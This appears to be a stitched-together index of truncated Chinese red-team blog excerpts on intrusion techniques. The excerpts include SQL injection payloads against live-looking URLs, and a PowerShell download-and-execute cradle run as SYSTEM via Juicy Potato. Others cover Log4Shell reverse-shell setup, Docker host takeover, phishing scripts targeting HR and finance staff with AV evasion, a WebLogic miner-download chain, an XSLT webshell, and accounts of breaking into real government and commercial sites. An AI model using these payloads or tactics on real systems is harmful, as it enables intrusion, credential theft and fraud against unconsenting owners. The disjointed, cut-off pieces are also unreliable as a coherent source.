红队攻击面相关讨论

信息收集 正准备开干，有人企鹅私聊我让我跟他赚大钱。 群发也就算了，都开始私聊了，现在不法分子猖狂到什么地步了，这能惯着它。。。京东卡先放放，打开前台是个博彩论坛。 随手一个login，后台出来了，网站是php的，常用口令试了几次，admin存在，密码错误。 放在云悉上看一下。 访问一下子域名，很僵硬。 再看看端口吧，3306开放，主机是Windows的。 收集完毕，框架没扫出来，几乎没啥进展，唯一的突破点就是后台和端口了。 登录后台 3306抱着尝试心态爆破试试，不出意外，mysql没出来。 top100后台爆破试了一下没出来，希望不大，翻找js，可能会有口令，敏感路径，特殊接口什么，但是真的干干净净，可能我看的不仔细。 没有其他突破点，只能再爆破后台试一下了，拿了个大字典，真的跑了超久，最后总算出来了，铁头娃在世。用的字典是人名缩写、年份、特殊字符给搞出来了。 坎坷上传 后台论坛文章管理处看见编辑器，瞬间两眼放光。 允许单图片、多图片尝试上传。 裂开了，白名单限制。 各种截断绕过失败。 看看是什么编辑器，翻找js文件，得知为wangeditor编辑器。 网上搜了一下，这个编辑器好像没什么漏洞，思路已干~ 转折出现 继续翻翻找找，发现订单详情也可下载订单图片。 下载链接： http://www.xxx.com/…

一、文件/文件夹管理 ls #列出当前目录文件（不包括隐含文件） ls -a #列出当前目录文件（包括隐含文件） ls -l #列出当前目录下文件的详细信息 ls -al #列出当前详细目录文件和隐藏的文件信息 cd .. #回当前目录的上一级目录 cd ~ #回当前用户的宿主目录 cd 目录名 #改变当前目录 pwd #查看当前目录路径 mkdir test #创建一个空目录 rmdir test #删除一个空目录 rm -rf dir #删除所有含有目录和文件 rm filename #删除一个文件或多个文件 mv /lib/usr /opt/ #将文件移动相对路经下的文件到…

简述 钓鱼是攻防对抗中一种常用的手段，攻击者通常伪装成可信任的实体，例如合法的机构、公司或个人，以引诱受害者揭示敏感信息或执行恶意操作，能快速地撕破目标的伤口，快速进内网进行刷分，投递木马同时需要考虑逃避杀毒软件检测，本篇文章将围绕一些常见的钓鱼手法和木马免杀对抗展开 信息搜集 批量邮箱搜集 https://app.snov.io/ http://www.skymem.info/ 搜索引擎 一般来说，企业邮箱都存在邮件网关，邮件投递容易被退信拦截，所以我们要选择私人邮箱或不被邮服拦截的邮箱： 如 xx举报，xx招聘面对大众的邮箱，相关语法： site:"xxx.com" 举报 site:"xxx.com" 招聘 xx公司举报 @126.com xx公司招聘 @qq.com 钓鱼手法 社工钓鱼 首先是目标选择，目标群体：hr、经理、财务 等安全意识薄弱的人优先选择，提前准备多套场景应对 选择目标公司分部进行钓鱼成功率较高，提前想好话术和应变对策，避免被识破，最好不要在总部，避开IT信息安全部 社牛的师傅可以尝试电话钓鱼，获取信任再添加微信发送木马（需要过人的心理素质和应变能力，之前从潘高工身上学到很多） 邮件钓鱼 群发邮件（不推荐，易被管理员发现或被邮件网关拦截） 搜集关键人物个人邮箱定向投递（推荐，隐蔽性强） 福利补贴发放 紧贴时事话题，使用各种福利活动吸引目标用户点击，把钓鱼链接转为二维码发送 简历投递 招聘投递简历，hr面对大量简历不会仔细查看后缀 钓鱼文案…

In Windows environments when a service is registered with the system a new key is created in the registry which contains the binary path. Even though that this escalation vector is not very common due to the fact that write access to the services registry key is granted only to Administrators by default however it should not be omitted by the penetration tester as another possible check. The process of privilege escalation via insecure registry permissions is very simple. Registry keys for the services that are running on the system can be found in the following registry path: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services If a standard user has permissions …

漏扫 nessus（Home版） openvas(在kali中安装openvas，注意挂代 理，不然会很慢很慢和报错) awvs（破解版-52pojie） APPscan (破解版) Burpsuite pro （破解版） mobsf (移动app客户端，支持ios，但是需要在mac上跑) Nmap/Zmap/masscan 端口扫描 漏洞管理 洞察insight smef Fuxi DefectDojo 项管 jira 禅道 src平台 SRCMS laravel-src 资产管理/自动化运维 xunfeng AssetsView 蓝鲸bk-cmdb OpsManage Ansible Saltstack soc sosrp w3a_SOC OpenSOC ossim 入侵检测/安全监控/流量回溯 suricata(selks) bro ossec(wazuh) Security Onion OwlH Nethserver Snort OpenWIPS-NG moloch 同程-驭龙 CloudWalker（牧云）现在只开放webshell查杀 Osquery web应用安全 ngx_lua_waf openstar ModSecurity openwaf openRASP x-waf jxwaf 终端安全集中管理 360企业版 火绒企业安全 堡垒机 jumpserver teleport 代码质量管理/代码审计 sonar + jekins cobra VCG fortify(破解版，找到最新…

（1）注入的分类 基于从服务器接收到的响应 ▲基于错误的SQL注入 ▲联合查询的类型 ▲堆查询注射 ▲SQL盲注 •基于布尔SQL盲注 •基于时间的SQL盲注 •基于报错的SQL盲注 基于如何处理输入的SQL查询（数据类型） •基于字符串 •数字或整数为基础的 基于程度和顺序的注入(哪里发生了影响) ★一阶注射 ★二阶注射 一阶注射是指输入的注射语句对WEB直接产生了影响，出现了结果；二阶注入类似存储型XSS，是指输入提交的语句，无法直接对WEB应用程序产生影响，通过其它的辅助间接的对WEB产生危害，这样的就被称为是二阶注入. 基于注入点的位置上的 ▲通过用户输入的表单域的注射。 ▲通过cookie注射。 ▲通过服务器变量注射。 （基于头部信息的注射） url编码：一般的url编码其实就是那个字符的ASCII值得十六进制，再在前面加个% 具体可以看http://www.w3school.com.cn/tags/html_ref_urlencode.html，这里可以查到每个字符的url编码，当然自己编程或者用该语言应该也有自带的函数，去实现url编码 常用的写出来吧： 空格是%20，单引号是%27， 井号是%23，双引号是%22 判断sql注入（显错和基于错误的盲注）：单引号，and 1=1 和and 1=2，双引号，反斜杠，注释等 判断基于时间的盲注:在上面的基础上，加个sleep函数 ，如sleep(5) (函数不同数据库有所不同)例子： ' and sleep(5) "…

1、供应链 在经历了多年的攻防对抗之后，大量目标单位逐渐认识到安全防护的重要性。因此，他们已采取措施尽可能收敛资产暴露面，并加倍部署各种安全设备。但安全防护注重全面性，具有明显的短板效应，一处出现短板，整个防护体系就可能瞬间崩溃。而目标单位的供应链往往是这些薄弱点的集中体现。这些供应链不仅暴露在外，而且由于复杂的关系，使得对它们的监控和管理变得更为困难。因此，攻击团队通常会选择从供应链着手，以一种迂回的方式绕过目标单位强大的防御体系，获得对目标单位的控制权限。 通过在搜索引擎上搜索"系统名称"目标单位 找到相关的供应商信息，通过对供应商进行攻击，获取目标单位的数据及权限。! 1.1、heapdump泄露 通过对供应商资产进行渗透，发现某资产admin目录下存在heapdump文件泄露 对于heapdump的利用方式这里就不太赘述，有许多文章对其原理和利用都进行了深入的研究，特定情况下还可以直接进行RCE，这里泄露了大量敏感信息，密码信息加入密码本 登录MinIO，发现大量所属目标单位的敏感信息，也存在其它单位的敏感信息 登录Nacos，大量配置文件，密码信息加入密码本![] 登录OSS，发现大量所属目标单位的敏感信息 1.2、微信小程序接口未授权 1.2.1、微信小程序解包 想要对微信小程序进行解包操作，首先是要获取目标小程序的wxapkg文件。wxapkg文件是微信小程序的安装包文件格式，用于将小程序的代码、资源以及其他必要的文件打包成一个单独的文件。但是Windows环境下的wxapkg文件…

说明Unauthorized是一套难度为中等的靶场环境，完成该挑战可以帮助玩家了解内网渗透中的代理转发、内网扫描、信息收集、特权提升以及横向移动技术方法，加强对域环境核心认证机制的理解，以及掌握域环境渗透中一些有趣的技术要点。该靶场共有3个flag，分布于不同的靶机。 技术FTP、Privilege Elevation、AD CS、Kerberos、域渗透 第一个flagdocker 未授权通过外网信息收集，发现docker未授权 https://cloud.tencent.com/developer/article/1744943 查看镜像 docker -H tcp://47.92.7.138:2375 images查看容器 docker -H tcp://47.92.7.138:2375 ps -a启动容器并将宿主机磁盘挂载到/mnt docker -H tcp://47.92.7.138:2375 run -it -v /:/mnt --entrypoint /bin/bash ubuntu:18.04写入公钥在vps上生成秘钥，敲下回车后会有3个交互，第一个是文件名，默认是id_rsa，如需修改，自己输入一个文件名便可。第二与第三是密码与确认密码，是以后使用该公钥时要输入的密码，一般不设置，如有强烈的安全需求，自己设置便可。最后会生成两个文件id_rsa，id_rsa.pub。以.pub结尾的是公钥，另一个是私钥 ssh-keygen -t rsa将公钥其写入到目标机器宿主机的/root/.ssh/authorized_keys…

0x00 前言刚结束某地HVV，小程序作为低成本易用的信息化系统，成为HVV新型重点突破对象。以下案例均来自于小程序，供大家学习。 0x01 案例一 某政务系统1.弱口令进入后台点击小程序，进入公民办事，抓到小程序域名，访问直接是管理员后台，如下页面即为Fastadmin框架 。 一直有个坑，登录一直显示口令无效，在我要放弃的时候，点击返回上一步提醒我，您已登录，我纳闷了，发现该系统登陆操作后token会刷新，导致下一次登录必须使用上一次token，否则口令无效。因此应该是网络或系统本身有延时，导致未成功使用正确token进行登陆操作，当发现这个问题的时候我已经admin/123456登进了后台。 内包含数据近20000条公民信息，以及管理员账户几百个，且所有管理员账户中的账户名密码均为admin/123456。与地级市HVV | 未授权访问合集中的案例四系统情况类似。（码死） 2.到处都是SQL注入前台业务处如下包，debug没有关导致爆出来数据库账户名密码，这个SQL注入太明显了，但此时我处在数据库账密的喜悦中没有搞SQL注入，可是这个数据库不对外，只能本地连接，烦死了。 后台查看管理员的时候存在延时注入 3.命令执行拿下服务器和数据库既然是fastadmin，那有很多拿shell的方法，这次是用在线命令插件漏洞写入PHP Webshell，该漏洞只在1.1.0可用。 但是这个系统是二开的，根本找不到插件的地方，在网上搜罗了一下拼接找到插件页面。 目录为：/addon?ref=addtabs 那该插件的目录就应该是/ad…

0x00 前言 早在2018年3月前，我就开始了一场毫无意义的争论，以证明TrustedToAuthForDelegation属性是无意义的，并且可以在没有该属性的情况下实现“协议转换”。我相信，只要一旦启用约束委派（msDS-AllowedToDelegateTo不为空），它是否配置为使用“仅Kerberos”或“任何身份验证协议”并起作用。 我在Benjamin Delpy（@gentilkiwi）的帮助下开始了这段研究过程，他帮助修改了kekekeo以支持一种特定的攻击，这种攻击涉及在没有PAC的情况下使用白银票据调用s4u2proxy，我们取得了部分成功，但最终的TGS却无法使用。从那时起，我就一直研究这个问题，试图用不同的方法来解决这个问题，但没有取得多大的成功。直到我最终接受了失败，具有讽刺意味的是，随后解决方案出现了，以及其他一些有趣的利用案例和新的攻击技术。 0x01 TL; DR 这篇文章篇幅很长，我很清楚很多人没有时间或毅力来阅读它，所以我将在下午中列出本文的重要点： 在调用S4U2Proxy时，基于资源的约束委派不需要可转发的TGS。 无论TrustedToAuthForDelegation属性的状态如何，S4U2Self都可以在任何具有SPN的帐户上运行。如果设置了TrustedToAuthForDelegation，则S4U2Self生成的TGS是可转发的，除非它对委派或受保护用户组的成员是信息敏感 以上几点意味着，如果攻击者可以控制Active Directory中的计算机对象，则可能会滥用该对…

0x00 工具介绍 前言 BeRoot是一个后期开发工具，用于检查常见的Windows的配置错误，以方便找到提高我们提权的方法。其二进制编译地址为： https://github.com/AlessandroZ/BeRoot/releases 它将作为后开发模块被添加到pupy（Pupy是一个开源，跨平台（Windows，Linux，OSX，Android），多功能RAT远程管理工具和后开发工具，主要用python编写）项目中（因此它将在内存中执行，而不会在硬盘中执行）。 需要注意的是，这款工具只能用来检测，而无法直接利用目标系统中存在的漏洞。但是，如果它发现了错误配置，它可以通过模版来利用这些漏洞。模版文件位于templates/service目录下，如果项目提供的模版文件无法运行，我们也可以根据目标系统的情况手动创建一个模版文件。 工具下载 【beRoot.zip】（zip） 【源代码】（zip） 【源代码】（tar.gz） 工具运行： |============================================== | | | Windows Privilege Escalation | | …

这站真大，不对，这站真圆.php的站随便随便一测 一枚注入 因为只能读取32位所以使用substring分开读取 https://aaaa.com/1.php?id=210%20and%20extractvalue(1,concat(0x7e,(select password from admin limit 1,1),0x7e))%20# https://aaaa.com/1.php?id=210%20and%20extractvalue(1,concat(0x7e,substring((select password from admin limit 1,1),30,35),0x7e))%20# 舒服了，这下可以给光明正大的进去选内衣了 0x02 拿shell 看看robots.txt inurl:a.com admin 进入后台发现是ECSHOP 这里原本是file改为image绕过 似乎不行被重置了 这里发现可以执行sql语句而且存在绝对路径泄露 ok下面就好说了，写入一句话 0x03 提权 权限有点小低 存在mysql也没其他可以利用的 尝试mysql提权 除了目录不能上传其他条件都满足所以当我没说，上cs,powershell上线 提权这里使用Juicy Potato 具体可以参考三好学生文章 选择想要的任何CLSID,链接 然后我们在以system权限执行powershell shell style.exe -p "powershell.exe -nop -w hidden -c \"IEX ((new-objec…

0x01 外网打点资产发现多测绘平台搜索 https://hunter.qianxin.com/ https://fofa.info/ https://quake.360.cn/ 多语法搜索 假如某个目标站点为xxxx.com ，我们可以通过不同的语法进行资产搜集，搜集的资产会更全面 这里以fofa为例 domain="xxxx.com" host="xxxx.com" header="xxxx.com" cert="xxxx.com" 敏感信息泄露对于学校站点的信息搜集，一般来说外网能拿直接权限的点已经很少了，web应用大多是放在vpn后面，因此能弄到一个vpn账号可以说是事半功倍，这时候可以通过语法对此类信息进行挖掘 常用命令如下： #google语法 site:*.edu.cn intext: vpn | 用户名 | 密码 | 帐号 | 默认密码 #github *.edu.cn password 在这次攻防演练里，也是幸运找到了某站点VPN的默认口令，使用的是 姓名拼音/12345678 弱口令 默认口令对于部分站点，在搭建完成后可能没有更改默认账号密码，这时候可以尝试使用默认账密登录 下面列举一些常见的web站点默认口令 账号： admin administrator root user test 密码： admin admin123 123456 123 test root 对于一些应用广泛的系统，可以通过google语法搜索其默认密码 这里通过sysadmin/1 成…

网络拓扑 信息搜集渗透测试第一步当然是信息搜集 拿到 IP192.168.81.151我们先使用nmap对他进行常规TCP端口的扫描 nmap -v -Pn -T3 -sV -n -sT --open -p 22,1222,2222,22345,23,21,445,135,139,5985,2121,3389,13389,6379,4505,1433,3306,5000,5236,5900,5432,1521,1099,53,995,8140,993,465,878,7001,389,902,1194,1080,88,38080 192.168.81.151 发现开放了22,38080这两个端口 通过nmap我们可以得知这是一台Ubuntu，22是ssh，而38080这个端口是unknown的，我们尝试访问一下 于是尝试最近爆出的新漏洞 CVE-2021-44228 尝试看看能不能获取到 dnslog 发现存在 CVE-2021-44228漏洞，尝试去获取一个shell CVE-2021-44228 利用首先在我们的VPS kali(192.168.81.133) 开启一个LDAP： git clone https://github.com/black9/Log4shell_JNDIExploit.git java -jar JNDIExploit-1.2-SNAPSHOT.jar -i 192.168.81.133 然后在kali上nc监听9999端口： 我们使用TOMCATBYpass进行反弹shell /bin/ba…

一、OA系统泛微(Weaver-Ecology-OA)🔸 泛微OA E-cology RCE(CNVD-2019-32204) - 影响版本7.0/8.0/8.1/9.0 🔸 泛微OA WorkflowCenterTreeData接口注入(限oracle数据库) 🔸 泛微ecology OA数据库配置信息泄露 🔸 泛微OA云桥任意文件读取 - 影响2018-2019 多个版本 🔸 泛微 e-cology OA 前台SQL注入漏洞 🔸 泛微OA系统 com.eweaver.base.security.servlet.LoginAction 参数keywordid SQL注入漏洞 🔸 泛微 OA sysinterface/codeEdit.jsp 页面任意文件上传 致远(Seeyon)🔸 致远OA-A8 htmlofficeservlet getshell 漏洞 🔸 致远OA Session泄漏漏洞 🔸 致远OA A6 search_result.jsp sql注入漏洞 🔸 致远OA A6 setextno.jsp sql注入漏洞 🔸 致远OA A6 重置数据库账号密码漏洞 🔸 致远OA A8 未授权访问 🔸 致远OA A8-v5 任意用户密码修改 🔸 致远OA A8-m 后台万能密码 🔸 致远OA 帆软报表组件 前台XXE漏洞 🔸 致远OA帆软报表组件反射型XSS&SSRF漏洞 Thinks:LandGrey 蓝凌OA暂无(希望大佬能提供) 通达OA🔸 通达OA任意文件删除&文件上传RCE分析(2020年hw 8月0…

0x00 前言简介 Microsoft为Windows Server 2008 R2（以及更高版本）提供了多个Active Directory PowerShell cmdlet，这大大简化了以前需要将涉及到的ADSI冗长代码行放在一起的任务。 在Windows客户端上，需要安装远程服务器管理工具（RSAT）并确保已安装Active Directory PowerShell模块。而在Windows服务器（2008 R2或更高版本）上的 PowerShell控制台（作为管理员）中运行如下命令：Import-Module ServerManager ; Add-WindowsFeature RSAT-AD-PowerShell。 0x01 AD的目录预览 AD PowerShell cmdlet和以下方式执行效果一样： Import-module activeDirectory $UserID = “JoeUser” Get-ADUser $UserID –property * 需要值得注意的是使用PowerShell v3版本以及高版本，你无需运行第一行命令，因为PowerShell的将识别必要的模块和自动加载它。一旦加载了Active Directory PowerShell模块，就可以像浏览文件系统那样浏览AD。命令如下： Ps> Import-module activeDirectory Ps>dir ad: Ps>set-location ad: Ps >set-loca…

0x00 前言上面给了个任务，一看，地图系统，懵逼了，这种的系统一般就是调个百度地图的api，无交互，想要挖洞简直难上加难... 一波信息收集后，发现该主站一个功能可以跳转到该单位的微信公众号，且存在上传点，因此有了本文。 0x01 FUZZ有了上传点，废话不多说先看看后缀能不能过 先传一个图片，更改后缀尝试上传 直接没了，难道是白名单吗，尝试随意后缀上传 发现可以上传，可能是存在waf？ 直接传内容为一句话，看看会不会被拦截 结果没被拦截，应该是代码对后缀做了一些操作， 接下来就是一顿fuzz，搞了半天发现后缀名这边是过不去了，换行大法直接报错 拿出之前过安全狗的方法试了一下，溢出Content-Disposition:字段， 竟然就这么成功了... 0x02 又一个问题现在传是传上去了，但是没有返回完整路径，也不知道传哪儿去了，这咋整 扫当前目录啥也没扫到 然后扫了波一级目录，发现存在upload目录， 尝试拼接，成功getshell 0x03 总结1.通过目标站点的公众号处存在一处附件上传，那么可能存在任意文件上传漏洞2.通过bp的intruder功能对后缀名进行批量fuzz，发现都被拦截，这里又测试上传test.aaa，内容为this is a test,发现可以上传，那么猜测目标站点存在WAF,拦截了后缀名3.接着测试上传的内容为一句话木马，可成功上传，并没有对内容进行拦截3.通过Content-Disposition:拦截字段填充可绕过waf成功上传，并返回上传的文件名，但是并不知道上传的路径如:Co…

前言 房间地址：https://tryhackme.com/room/introdigitalforensics 作为一名数字取证调查员，您会看到与上图所示类似的场景。作为数字取证调查员，您应该做什么？获得适当的法律授权后，基本计划如下： 获取证据：收集笔记本电脑、存储设备、数码相机等数字设备。（请注意，笔记本电脑和计算机在打开时需要特殊处理；但是，这超出了本房间的范围。） 建立监管链：正确填写相关表格（样本表格）。目的是确保只有经过授权的调查人员才能获取证据，并且任何人都无法篡改证据。 将证据放在安全的容器中：您要确保证据不会损坏。对于智能手机，您需要确保它们无法访问网络，这样它们就不会被远程擦除。 将证据传输到您的数字取证实验室。 在实验室，过程如下： 从安全容器中检索数字证据。 创建证据的取证副本：取证副本需要先进的软件以避免修改原始数据。 将数字证据返回到安全容器：您将处理副本。如果您损坏了副本，您随时可以创建一个新副本。 开始在取证工作站上处理副本。 上述步骤改编自计算机取证和调查指南，第 6 版。 更一般地说，根据国防计算机取证实验室前主任 Ken Zatyko 的说法，数字取证包括： 适当的搜查授权：如果没有适当的法律授权，调查人员就无法开始搜查。 监管链：这对于随时跟踪谁持有证据是必要的。 用数学验证：使用一种特殊的数学函数（称为哈希函数），我们可以确认文件未被修改。 使用经过验证的工…

1.搭建环境： 操作系统为：ubuntu16.04 x64位系统，内核版本3.0.10以上 2.安装docker镜像 root@backlion-virtual-machine:/# apt-get install docker.io 3.启动dokcer服务 root@backlion-virtual-machine:/# service docker start 4.拉取pocscan的镜像，并安装 root@backlion-virtual-machine:/# docker pull daocloud.io/aber/pocscan:latest 5.切换到根目录 root@backlion-virtual-machine:/# cd / 6.通过git clone下载源码到本地根目录 root@backlion-virtual-machine:/# git clone https://github.com/erevus-cn/pocscan.git 7.更改pocscan目录为可读可写权限 root@backlion-virtual-machine:/# chmod -R 0777 pocscan 8.将dokcer的8000端口映射到物理机的8090端口上 root@backlion-virtual-machine:/# docker run -d -v /pocscan:/www -p 8090:8000 -p 8088:8088 daocloud.io/aber/pocscan…

0x00 前言 问题发生在user.php的的显示函数，模版变量可控，导致注入，配合注入可达到远程代码执行 0x01 漏洞分析 1.SQL注入 先看user.php的$ back_act变量来源于HTTP_REFERER，我们可控。 分配函数用于在模版变量里赋值 再看显示函数, 读取user_passport.dwt模版文件内容，显示解析变量后的HTML内容，用_echash做分割，得到$ķ然后交给isnert_mod处理，由于_echash是默认的，不是随机生成的，所以$ VAL内容可随意控制。 再看insert_mod函数, 非常关键的一个地方，这里进行了动态调用$ VAL传入进来用|分割，参数传入进来时需要被序列化 再看包括/ lib_insert.php中的insert_ads函数, 可以看到这里直接就能注入了 2.代码执行 继续看取函数 追踪_eval函数 $ position_style变量来源于数据库中的查询结构 然后我们继续构造SQL注入，因为这段sql操作命令由部分换行了截断不了所以需要在id处构造注释来配合num进行union。 函数中有一个判断 我们id传入'/ * num传入* / union选择1,0x272f2a，3,4,5,6,7,8,9,10- - 就能绕过了，其poc: SELECT a.ad_id, a.position_id, a.media_type, a.ad_link, a.ad_code, a.ad_name, p.a…

解决方法 相信大家都已经遇到了,国内的镜像站炸了,如果是香港或者国外的可以正常拉取镜像,国内机器如果挂TZ也可以拉取 拉取失败就如下图所示： 解决方法: 连接SSH 或打开图形化面板(如宝塔等) 打开 /etc/docekr 的文件夹，若etc下没有docker文件夹就手动创建一个 然后进入docker文件夹后。 创建一个名为：daemon.json的json文件 然后在文件里输入以下代码内容： { "registry-mirrors": [ "https://docker.m.daocloud.io", "https://docker.nju.edu.cn", { "registry-mirrors": [ "https://docker.m.daocloud.io", "https://docker.nju.edu.cn", "https://dockerproxy.com" ] } 然后保存并退出 之后重启一下docker： systemctl restart docker 再次拉取镜像就可以了 师傅们的VPS如果是香港或者是国外的请无视本文章

0x01 前言在getST.py（https://github.com/SecureAuthCorp/impacket/blob/master/examples/）中添加了一个新的PR-force-forwardable标识。启用该标识后，程序将执行以下步骤（新添加的内容以粗体显示）： 程序将使用通过-hash或-aesKey参数提供的密钥，获得一个TGT作为命令行指定的服务主体程序将通过其TGT执行S4U2self交换，以获得通过-impersonate参数指定的用户的服务主体的服务票据程序将使用步骤1中使用的服务主体的相同密钥来解密服务票据程序将编辑服务票据，将“ forwardable”标识设置为1。程序将使用服务主体的密钥重新加密编辑后的服务票据。程序将与服务票证及其TGT进行S4U2proxy交换，以获得作为通过-spn参数指定的服务的模拟用户的服务票据该程序将输出结果作为服务票据，该服务票据可用于对目标服务进行身份验证并模拟目标用户。通过编辑票据并将其forwardable bit 强制设置为1，该程序可以模拟作为“受保护的用户”组成员或使用“帐户敏感且无法委派（Account is sensitive and cannot be delegated"）”设置配置的用户。这也允许该程序与为“仅Kerberos”约束委派配置的服务一起使用。在下面的示例中，“Service1”允许对“Service2”执行约束委派，而User2被配置为“账号敏感且无法委派（sensitive and cannot delegat）”。如果没有…

前言 29号开始的 31号域开始打,打了一天到2月1 WEEK1就卡瓶颈了 整个参赛人数接近2千,写笔记记录一下一些脚本和解题思路 注:本文章在比赛结束前已开启文章密码保护,未泄露解题思路,比赛结束后正式开放文章 ->Web方向 冲 Bypass it 点击注册 尝试burpsuite爆破无果,题目说不让禁用js 但那是迷惑人的,最后禁用js就可以注册成功 禁用后注册即可 注册成功直接登录就能拿到flag ez http 打开后发现需要添加refrer头跟进访问此网站 Burpsuite开盒即用中文版： 最新BurpSuite2023专业汉化版下载（无需任何配置） 2年前29106110 抓包发送到重放器里面,且添加头部文件 让后这里说需要添加ua标识 直接复制在改上去 有实战渗透的的操作了(出的题就是好!,因为一些学校的edu还有公司网站的后…

WebLogic XMLDecoder反序列化漏洞(CVE-2017-10271) -----by backlion 0x01漏洞说明 近日，黑客利用WebLogic 反序列化漏洞CVE-2017-3248和WebLogic WLS LS组件的远程代码执行漏洞CVE-2017-10271，Oracle官方在2017年10月份发布了该漏洞的补丁，但没有公开漏洞细节，如果企业未及时安装补丁，存在被攻击的风险。对企业服务器发起了大范围远程攻击，对大量企业的服务器造成了严重威胁，受影响版本：10.3.6.0.0, 12.1.3.0.0, 12.2.1.1.0, 12.2.1.2.0 0x02 攻击说明 攻击者选定要攻击的目标主机后，将首先利用漏洞CVE-2017-3248进行攻击，无论是否成功，都将再利用CVE-2017-10271进行攻击。在每一次的攻击过程中，都是先针对Windows系统，再针对Linux系统。具体攻击流程如下： 1、利用 WebLogic 反序列化漏洞（CVE-2017-3248）调用 Linux 中的wget 下载shell脚本并调用Linux本地“/bin/bash”执行shell脚本。（shell脚本内容内定义了从远端下载执行watch-smartd挖矿程序控制细节） 2、 利用 WebLogic 反序列化漏洞（CVE-2017-3248）调用 Windows 中的PowerShell进行样本下载和运…

关于使用xsl的webshell以前已经有人发过了，比如aspx的一个webshell如下： <%@ Page Language="C#" Debug="true" %> <%@ import Namespace="System.IO"%> <%@ import Namespace="System.Xml"%> <%@ import Namespace="System.Xml.Xsl"%> <% string xml=@"<?xml version=""1.0""?><root>test</root>"; string xslt=@"<?xml version='1.0'?> <xsl:stylesheet version=""1.0"" xmlns:xsl=""http://www.w3.org/1999/XSL/Transform"" xmlns:msxsl=""urn:schemas-microsoft-com:xslt"" xmlns:zcg=""zcgonvh""> <msxsl:script language=""JScript"" implements-prefix=""zcg""> <msxsl:assembly name=""mscorlib, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b77a5c56193…